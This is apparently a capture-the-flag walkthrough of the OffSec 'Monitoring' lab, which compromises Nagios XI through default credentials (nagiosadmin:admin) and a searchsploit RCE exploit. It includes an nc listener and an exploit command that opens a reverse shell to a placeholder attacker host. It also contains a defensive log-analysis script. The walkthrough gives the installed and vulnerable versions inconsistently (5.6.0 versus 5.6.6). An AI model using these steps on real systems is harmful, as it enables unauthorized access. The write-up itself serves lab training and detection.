This is a walkthrough of the machine Monitoring from OffSec's Proving Grounds Play labs.
Machine information:
- Level: Easy
- Community rating: Intermediate
- Flags: 1
- OS: Linux
- Vector: Webapp
Nmap
sudo nmap -A --open -sV -sC -v -p- <IP>
Starting off with an Nmap scan, we discover the following open ports:
- 22 - SSH
- 25 - SMTP
- 80 - HTTP
- 389 - LDAP
- 443 - HTTPS
- 5667 - NSCA

Webapp
The web application on ports 80/443 is running Nagios XI.

Navigating to /nagiosxi/login.php, we land on a login page.

Now, a little bit of research into Nagios XI default credentials reveals the default username for the web interface: nagiosadmin.

Playing around with the most commonly seen administrator passwords, we discover that the credential pair nagiosadmin:admin works, and we can access the interface.
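The default-credential guessing above leaves a clear trace in the web server log: a burst of POST requests to the login page from one source, followed by a redirect once a password works. The script below is an added example (not part of the original walkthrough, and not Nagios XI's own tooling) that runs that detection logic over a few constructed Apache "combined" log lines. It assumes that a failed Nagios XI login re-renders the form with HTTP 200 and a successful one answers with a 302 redirect; check that against your own deployment before relying on it.

```python
"""Flag password guessing against /nagiosxi/login.php in Apache access logs.

Added example, not code from the original walkthrough or from Nagios.
Assumptions (adjust for your environment):
  * Apache 'combined' log format.
  * A failed login is a POST to LOGIN_PATH answered with 200 (form re-shown).
  * A successful login is a POST to LOGIN_PATH answered with 302 (redirect).
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATH = "/nagiosxi/login.php"

# Constructed sample log: one source guesses six passwords and then gets in,
# a second source logs in normally, a third mistypes twice and then succeeds.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2024:10:00:01 +0000] "POST /nagiosxi/login.php HTTP/1.1" 200 5120 "-" "curl/8.0"
203.0.113.5 - - [10/Mar/2024:10:00:02 +0000] "POST /nagiosxi/login.php HTTP/1.1" 200 5120 "-" "curl/8.0"
203.0.113.5 - - [10/Mar/2024:10:00:03 +0000] "POST /nagiosxi/login.php HTTP/1.1" 200 5120 "-" "curl/8.0"
203.0.113.5 - - [10/Mar/2024:10:00:04 +0000] "POST /nagiosxi/login.php HTTP/1.1" 200 5120 "-" "curl/8.0"
203.0.113.5 - - [10/Mar/2024:10:00:05 +0000] "POST /nagiosxi/login.php HTTP/1.1" 200 5120 "-" "curl/8.0"
203.0.113.5 - - [10/Mar/2024:10:00:06 +0000] "POST /nagiosxi/login.php HTTP/1.1" 200 5120 "-" "curl/8.0"
203.0.113.5 - - [10/Mar/2024:10:00:07 +0000] "POST /nagiosxi/login.php HTTP/1.1" 302 0 "-" "curl/8.0"
198.51.100.7 - - [10/Mar/2024:10:00:30 +0000] "GET /nagiosxi/login.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2024:10:00:40 +0000] "POST /nagiosxi/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2024:10:05:00 +0000] "POST /nagiosxi/login.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2024:10:05:20 +0000] "POST /nagiosxi/login.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2024:10:05:35 +0000] "POST /nagiosxi/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],  # drop any query string
        "status": int(m["status"]),
    }


def detect_guessing(lines, threshold=5, window=timedelta(minutes=5)):
    """Return {ip: summary} for each source that produced more than `threshold`
    failed login POSTs inside any `window`, noting whether a successful login
    followed the burst (a guessed password, not just noise)."""
    attempts = defaultdict(list)  # ip -> [(timestamp, status)]
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == LOGIN_PATH:
            attempts[rec["ip"]].append((rec["ts"], rec["status"]))

    findings = {}
    for ip, events in attempts.items():
        events.sort()
        failures = [ts for ts, st in events if st == 200]
        # Sliding window: largest number of failures inside any `window` span.
        burst, start = 0, 0
        for end, ts in enumerate(failures):
            while ts - failures[start] > window:
                start += 1
            burst = max(burst, end - start + 1)
        if failures and burst > threshold:
            last_fail = failures[-1]
            success_after = any(st == 302 and ts >= last_fail for ts, st in events)
            findings[ip] = {
                "failed": len(failures),
                "max_burst": burst,
                "success_after_burst": success_after,
            }
    return findings


if __name__ == "__main__":
    for ip, summary in detect_guessing(SAMPLE_LOG.splitlines()).items():
        print(ip, summary)
```

On the constructed sample only 203.0.113.5 is reported: six failures inside the window and a 302 immediately after, which is the signature of a default or weak password being found rather than a user mistyping. The same logic applies unchanged to a real access log read line by line; the threshold and window are the knobs to tune against your own baseline of legitimate failed logins.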

Navigating to Admin -> System Information -> Check for Updates, we can find the installed version, which is 5.6.0.

Initial access
Using searchsploit, we find that version 5.6.6 of the application is vulnerable to RCE.
searchsploit nagios 5.6

We'll copy the script into our working directory and take a closer look.
searchsploit -m 52138

It looks like we have everything needed to run this exploit (valid credentials and the base path to Nagios XI), so we start a listener on our attack box and run the exploit:
nc -lvnp <PORT>
python3 52138.txt -t http://<VICTIM_IP> -b /nagiosxi/ -u nagiosadmin -p admin -lh <ATTACKER_IP> -lp <LPORT>
And just like that, we receive a shell as root and can read the proof.txt flag:
